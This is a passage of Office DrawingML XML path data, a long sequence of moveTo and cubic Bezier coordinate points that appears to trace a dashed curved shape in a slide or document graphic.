                    <a:pt x="3" y="1106"/>
                    <a:pt x="1" y="1107"/>
                    <a:pt x="1" y="1110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="1116"/>
                    <a:pt x="2" y="1123"/>
                    <a:pt x="2" y="1130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="1132"/>
                    <a:pt x="4" y="1134"/>
                    <a:pt x="6" y="1133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="1133"/>
                    <a:pt x="10" y="1131"/>
                    <a:pt x="10" y="1129"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="13" y="1169"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="1162"/>
                    <a:pt x="12" y="1156"/>
                    <a:pt x="11" y="1149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="1147"/>
                    <a:pt x="9" y="1145"/>
                    <a:pt x="7" y="1145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="1146"/>
                    <a:pt x="3" y="1148"/>
                    <a:pt x="4" y="1150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="1156"/>
                    <a:pt x="5" y="1163"/>
                    <a:pt x="5" y="1170"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="1172"/>
                    <a:pt x="7" y="1174"/>
                    <a:pt x="10" y="1173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="1173"/>
                    <a:pt x="13" y="1171"/>
                    <a:pt x="13" y="1169"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="18" y="1209"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="1202"/>
                    <a:pt x="16" y="1196"/>
                    <a:pt x="15" y="1189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="1187"/>
                    <a:pt x="13" y="1185"/>
                    <a:pt x="11" y="1185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="1186"/>
                    <a:pt x="7" y="1188"/>
                    <a:pt x="7" y="1190"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="1196"/>
                    <a:pt x="9" y="1203"/>
                    <a:pt x="10" y="1210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="1212"/>
                    <a:pt x="12" y="1213"/>
                    <a:pt x="14" y="1213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="1213"/>
                    <a:pt x="18" y="1211"/>
                    <a:pt x="18" y="1209"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="24" y="1248"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="1242"/>
                    <a:pt x="21" y="1235"/>
                    <a:pt x="20" y="1228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="1226"/>
                    <a:pt x="18" y="1225"/>
                    <a:pt x="16" y="1225"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="1225"/>
                    <a:pt x="12" y="1227"/>
                    <a:pt x="13" y="1230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="1236"/>
                    <a:pt x="15" y="1243"/>
                    <a:pt x="16" y="1250"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="1252"/>
                    <a:pt x="18" y="1253"/>
                    <a:pt x="20" y="1253"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="1252"/>
                    <a:pt x="24" y="1250"/>
                    <a:pt x="24" y="1248"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="31" y="1287"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="1281"/>
                    <a:pt x="28" y="1274"/>
                    <a:pt x="27" y="1268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="1266"/>
                    <a:pt x="25" y="1264"/>
                    <a:pt x="22" y="1265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="1265"/>
                    <a:pt x="19" y="1267"/>
                    <a:pt x="19" y="1269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="1276"/>
                    <a:pt x="22" y="1282"/>
                    <a:pt x="23" y="1289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="1291"/>
                    <a:pt x="26" y="1293"/>
                    <a:pt x="28" y="1292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="1292"/>
                    <a:pt x="32" y="1290"/>
                    <a:pt x="31" y="1287"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="40" y="1326"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="1320"/>
                    <a:pt x="37" y="1313"/>
                    <a:pt x="35" y="1307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="1305"/>
                    <a:pt x="33" y="1303"/>
                    <a:pt x="31" y="1304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="1304"/>
                    <a:pt x="27" y="1306"/>
                    <a:pt x="28" y="1309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="1315"/>
                    <a:pt x="31" y="1322"/>
                    <a:pt x="32" y="1328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="1330"/>
                    <a:pt x="35" y="1332"/>
                    <a:pt x="37" y="1331"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="1331"/>
                    <a:pt x="41" y="1328"/>
                    <a:pt x="40" y="1326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="1326"/>
                    <a:pt x="40" y="1326"/>
                    <a:pt x="40" y="1326"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="50" y="1365"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="1358"/>
                    <a:pt x="47" y="1352"/>
                    <a:pt x="45" y="1346"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="1343"/>
                    <a:pt x="42" y="1342"/>
                    <a:pt x="40" y="1343"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="1343"/>
                    <a:pt x="37" y="1346"/>
                    <a:pt x="37" y="1348"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="1354"/>
                    <a:pt x="41" y="1361"/>
                    <a:pt x="43" y="1367"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="1369"/>
                    <a:pt x="46" y="1370"/>
                    <a:pt x="48" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="1369"/>
                    <a:pt x="51" y="1367"/>
                    <a:pt x="50" y="1365"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="1365"/>
                    <a:pt x="50" y="1365"/>
                    <a:pt x="50" y="1365"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="62" y="1403"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="1397"/>
                    <a:pt x="58" y="1390"/>
                    <a:pt x="56" y="1384"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="1382"/>
                    <a:pt x="53" y="1381"/>
                    <a:pt x="51" y="1381"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="1382"/>
                    <a:pt x="48" y="1384"/>
                    <a:pt x="48" y="1386"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="1393"/>
                    <a:pt x="53" y="1399"/>
                    <a:pt x="55" y="1405"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="1407"/>
                    <a:pt x="58" y="1409"/>
                    <a:pt x="60" y="1408"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="1407"/>
                    <a:pt x="63" y="1405"/>
                    <a:pt x="62" y="1403"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="75" y="1441"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="1434"/>
                    <a:pt x="71" y="1428"/>
                    <a:pt x="69" y="1422"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="1420"/>
                    <a:pt x="66" y="1419"/>
                    <a:pt x="64" y="1419"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="1420"/>
                    <a:pt x="60" y="1422"/>
                    <a:pt x="61" y="1424"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="1431"/>
                    <a:pt x="66" y="1437"/>
                    <a:pt x="68" y="1443"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="1445"/>
                    <a:pt x="71" y="1446"/>
                    <a:pt x="73" y="1446"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="1445"/>
                    <a:pt x="76" y="1443"/>
                    <a:pt x="75" y="1441"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="90" y="1478"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="1471"/>
                    <a:pt x="85" y="1465"/>
                    <a:pt x="83" y="1459"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="1457"/>
                    <a:pt x="80" y="1456"/>
                    <a:pt x="77" y="1457"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="1458"/>
                    <a:pt x="74" y="1460"/>
                    <a:pt x="75" y="1462"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="1468"/>
                    <a:pt x="80" y="1474"/>
                    <a:pt x="83" y="1481"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="1483"/>
                    <a:pt x="86" y="1484"/>
                    <a:pt x="88" y="1483"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="1482"/>
                    <a:pt x="91" y="1480"/>
                    <a:pt x="90" y="1478"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="106" y="1514"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="1508"/>
                    <a:pt x="101" y="1502"/>
                    <a:pt x="98" y="1496"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="1494"/>
                    <a:pt x="95" y="1493"/>
                    <a:pt x="93" y="1494"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="1495"/>
                    <a:pt x="90" y="1497"/>
                    <a:pt x="91" y="1499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="1505"/>
                    <a:pt x="96" y="1511"/>
                    <a:pt x="99" y="1517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="1519"/>
                    <a:pt x="102" y="1520"/>
                    <a:pt x="104" y="1519"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="1518"/>
                    <a:pt x="107" y="1516"/>
                    <a:pt x="106" y="1514"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="124" y="1550"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="1544"/>
                    <a:pt x="118" y="1538"/>
                    <a:pt x="115" y="1532"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="1530"/>
                    <a:pt x="111" y="1529"/>
                    <a:pt x="109" y="1530"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="1531"/>
                    <a:pt x="107" y="1533"/>
                    <a:pt x="108" y="1535"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="1541"/>
                    <a:pt x="113" y="1547"/>
                    <a:pt x="116" y="1553"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="1555"/>
                    <a:pt x="120" y="1556"/>
                    <a:pt x="122" y="1555"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="1554"/>
                    <a:pt x="125" y="1552"/>
                    <a:pt x="124" y="1550"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="142" y="1585"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="1579"/>
                    <a:pt x="136" y="1573"/>
                    <a:pt x="133" y="1567"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="1565"/>
                    <a:pt x="129" y="1565"/>
                    <a:pt x="127" y="1566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="1567"/>
                    <a:pt x="125" y="1569"/>
                    <a:pt x="126" y="1571"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="1577"/>
                    <a:pt x="132" y="1583"/>
                    <a:pt x="135" y="1589"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="1591"/>
                    <a:pt x="139" y="1591"/>
                    <a:pt x="141" y="1590"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="1589"/>
                    <a:pt x="143" y="1587"/>
                    <a:pt x="142" y="1585"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="162" y="1619"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="1614"/>
                    <a:pt x="156" y="1608"/>
                    <a:pt x="152" y="1602"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="1600"/>
                    <a:pt x="149" y="1600"/>
                    <a:pt x="147" y="1601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="1602"/>
                    <a:pt x="144" y="1604"/>
                    <a:pt x="145" y="1606"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="1612"/>
                    <a:pt x="152" y="1618"/>
                    <a:pt x="156" y="1623"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="1625"/>
                    <a:pt x="159" y="1626"/>
                    <a:pt x="161" y="1625"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="1624"/>
                    <a:pt x="164" y="1621"/>
                    <a:pt x="162" y="1619"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="184" y="1653"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="1647"/>
                    <a:pt x="176" y="1642"/>
                    <a:pt x="173" y="1636"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="1634"/>
                    <a:pt x="169" y="1634"/>
                    <a:pt x="167" y="1635"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="1636"/>
                    <a:pt x="165" y="1639"/>
                    <a:pt x="166" y="1640"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="1646"/>
                    <a:pt x="173" y="1652"/>
                    <a:pt x="177" y="1657"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="1659"/>
                    <a:pt x="181" y="1660"/>
                    <a:pt x="183" y="1658"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="1657"/>
                    <a:pt x="185" y="1655"/>
                    <a:pt x="184" y="1653"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="1653"/>
                    <a:pt x="184" y="1653"/>
                    <a:pt x="184" y="1653"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="206" y="1686"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="1680"/>
                    <a:pt x="199" y="1675"/>
                    <a:pt x="195" y="1669"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="1668"/>
                    <a:pt x="191" y="1667"/>
                    <a:pt x="189" y="1668"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="1670"/>
                    <a:pt x="187" y="1672"/>
                    <a:pt x="188" y="1674"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="1679"/>
                    <a:pt x="196" y="1685"/>
                    <a:pt x="200" y="1690"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="201" y="1692"/>
                    <a:pt x="204" y="1693"/>
                    <a:pt x="205" y="1691"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="1690"/>
                    <a:pt x="208" y="1687"/>
                    <a:pt x="206" y="1686"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="230" y="1718"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="1712"/>
                    <a:pt x="222" y="1707"/>
                    <a:pt x="218" y="1702"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="1700"/>
                    <a:pt x="214" y="1700"/>
                    <a:pt x="212" y="1701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="1702"/>
                    <a:pt x="210" y="1705"/>
                    <a:pt x="212" y="1707"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="1712"/>
                    <a:pt x="220" y="1717"/>
                    <a:pt x="224" y="1722"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="1724"/>
                    <a:pt x="228" y="1725"/>
                    <a:pt x="229" y="1723"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="1722"/>
                    <a:pt x="231" y="1719"/>
                    <a:pt x="230" y="1718"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="255" y="1749"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="1744"/>
                    <a:pt x="247" y="1738"/>
                    <a:pt x="242" y="1733"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="241" y="1732"/>
                    <a:pt x="239" y="1731"/>
                    <a:pt x="237" y="1733"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="235" y="1734"/>
                    <a:pt x="235" y="1737"/>
                    <a:pt x="236" y="1738"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="1743"/>
                    <a:pt x="245" y="1749"/>
                    <a:pt x="249" y="1754"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="250" y="1755"/>
                    <a:pt x="253" y="1756"/>
                    <a:pt x="255" y="1754"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="256" y="1753"/>
                    <a:pt x="256" y="1750"/>
                    <a:pt x="255" y="1749"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="281" y="1779"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="277" y="1774"/>
                    <a:pt x="272" y="1769"/>
                    <a:pt x="268" y="1764"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="267" y="1762"/>
                    <a:pt x="264" y="1762"/>
                    <a:pt x="262" y="1763"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="261" y="1765"/>
                    <a:pt x="261" y="1767"/>
                    <a:pt x="262" y="1769"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="1774"/>
                    <a:pt x="271" y="1779"/>
                    <a:pt x="275" y="1784"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="277" y="1786"/>
                    <a:pt x="279" y="1786"/>
                    <a:pt x="281" y="1784"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283" y="1783"/>
                    <a:pt x="283" y="1780"/>
                    <a:pt x="281" y="1779"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="308" y="1808"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="304" y="1803"/>
                    <a:pt x="299" y="1798"/>
                    <a:pt x="295" y="1793"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="1792"/>
                    <a:pt x="291" y="1792"/>
                    <a:pt x="289" y="1793"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="287" y="1795"/>
                    <a:pt x="287" y="1797"/>
                    <a:pt x="289" y="1799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="1804"/>
                    <a:pt x="298" y="1809"/>
                    <a:pt x="303" y="1813"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="304" y="1815"/>
                    <a:pt x="307" y="1815"/>
                    <a:pt x="308" y="1814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="310" y="1812"/>
                    <a:pt x="310" y="1809"/>
                    <a:pt x="308" y="1808"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="337" y="1836"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="1831"/>
                    <a:pt x="327" y="1827"/>
                    <a:pt x="323" y="1822"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="1820"/>
                    <a:pt x="318" y="1821"/>
                    <a:pt x="317" y="1822"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="315" y="1824"/>
                    <a:pt x="315" y="1826"/>
                    <a:pt x="317" y="1828"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="322" y="1832"/>
                    <a:pt x="326" y="1837"/>
                    <a:pt x="331" y="1842"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="1843"/>
                    <a:pt x="335" y="1843"/>
                    <a:pt x="337" y="1842"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="338" y="1840"/>
                    <a:pt x="338" y="1837"/>
                    <a:pt x="337" y="1836"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="366" y="1863"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="361" y="1859"/>
                    <a:pt x="356" y="1854"/>
                    <a:pt x="351" y="1850"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="1848"/>
                    <a:pt x="347" y="1848"/>
                    <a:pt x="346" y="1850"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="344" y="1851"/>
                    <a:pt x="344" y="1854"/>
                    <a:pt x="346" y="1855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="351" y="1860"/>
                    <a:pt x="356" y="1865"/>
                    <a:pt x="361" y="1869"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="363" y="1870"/>
                    <a:pt x="365" y="1870"/>
                    <a:pt x="367" y="1869"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="368" y="1867"/>
                    <a:pt x="368" y="1864"/>
                    <a:pt x="366" y="1863"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="366" y="1863"/>
                    <a:pt x="366" y="1863"/>
                    <a:pt x="366" y="1863"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="397" y="1889"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="391" y="1885"/>
                    <a:pt x="386" y="1880"/>
                    <a:pt x="381" y="1876"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="380" y="1875"/>
                    <a:pt x="377" y="1875"/>
                    <a:pt x="376" y="1877"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="1878"/>
                    <a:pt x="374" y="1881"/>
                    <a:pt x="376" y="1882"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="381" y="1887"/>
                    <a:pt x="386" y="1891"/>
                    <a:pt x="391" y="1895"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="393" y="1896"/>
                    <a:pt x="396" y="1896"/>
                    <a:pt x="397" y="1895"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="1893"/>
                    <a:pt x="398" y="1890"/>
                    <a:pt x="397" y="1889"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="428" y="1914"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="423" y="1910"/>
                    <a:pt x="417" y="1906"/>
                    <a:pt x="412" y="1901"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410" y="1900"/>
                    <a:pt x="408" y="1900"/>
                    <a:pt x="406" y="1902"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="405" y="1904"/>
                    <a:pt x="405" y="1906"/>
                    <a:pt x="407" y="1908"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="412" y="1912"/>
                    <a:pt x="418" y="1916"/>
                    <a:pt x="423" y="1920"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="425" y="1921"/>
                    <a:pt x="427" y="1921"/>
                    <a:pt x="429" y="1919"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="430" y="1917"/>
                    <a:pt x="430" y="1915"/>
                    <a:pt x="428" y="1914"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="460" y="1937"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="455" y="1933"/>
                    <a:pt x="449" y="1929"/>
                    <a:pt x="444" y="1926"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="442" y="1924"/>
                    <a:pt x="440" y="1925"/>
                    <a:pt x="438" y="1926"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="437" y="1928"/>
                    <a:pt x="437" y="1931"/>
                    <a:pt x="439" y="1932"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="445" y="1936"/>
                    <a:pt x="450" y="1940"/>
                    <a:pt x="456" y="1944"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="457" y="1945"/>
                    <a:pt x="460" y="1945"/>
                    <a:pt x="461" y="1943"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="462" y="1941"/>
                    <a:pt x="462" y="1938"/>
                    <a:pt x="460" y="1937"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="493" y="1960"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="488" y="1956"/>
                    <a:pt x="482" y="1952"/>
                    <a:pt x="477" y="1949"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="475" y="1947"/>
                    <a:pt x="472" y="1948"/>
                    <a:pt x="471" y="1950"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="470" y="1951"/>
                    <a:pt x="470" y="1954"/>
                    <a:pt x="472" y="1955"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="478" y="1959"/>
                    <a:pt x="483" y="1963"/>
                    <a:pt x="489" y="1966"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="491" y="1967"/>
                    <a:pt x="493" y="1967"/>
                    <a:pt x="494" y="1965"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="496" y="1963"/>
                    <a:pt x="495" y="1961"/>
                    <a:pt x="493" y="1960"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="493" y="1960"/>
                    <a:pt x="493" y="1960"/>
                    <a:pt x="493" y="1960"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="527" y="1981"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="521" y="1977"/>
                    <a:pt x="516" y="1974"/>
                    <a:pt x="510" y="1970"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="1969"/>
                    <a:pt x="506" y="1970"/>
                    <a:pt x="505" y="1972"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="503" y="1973"/>
                    <a:pt x="504" y="1976"/>
                    <a:pt x="506" y="1977"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="512" y="1981"/>
                    <a:pt x="517" y="1984"/>
                    <a:pt x="523" y="1988"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="525" y="1989"/>
                    <a:pt x="527" y="1988"/>
                    <a:pt x="529" y="1986"/>
                  </a:cubicBezTo>
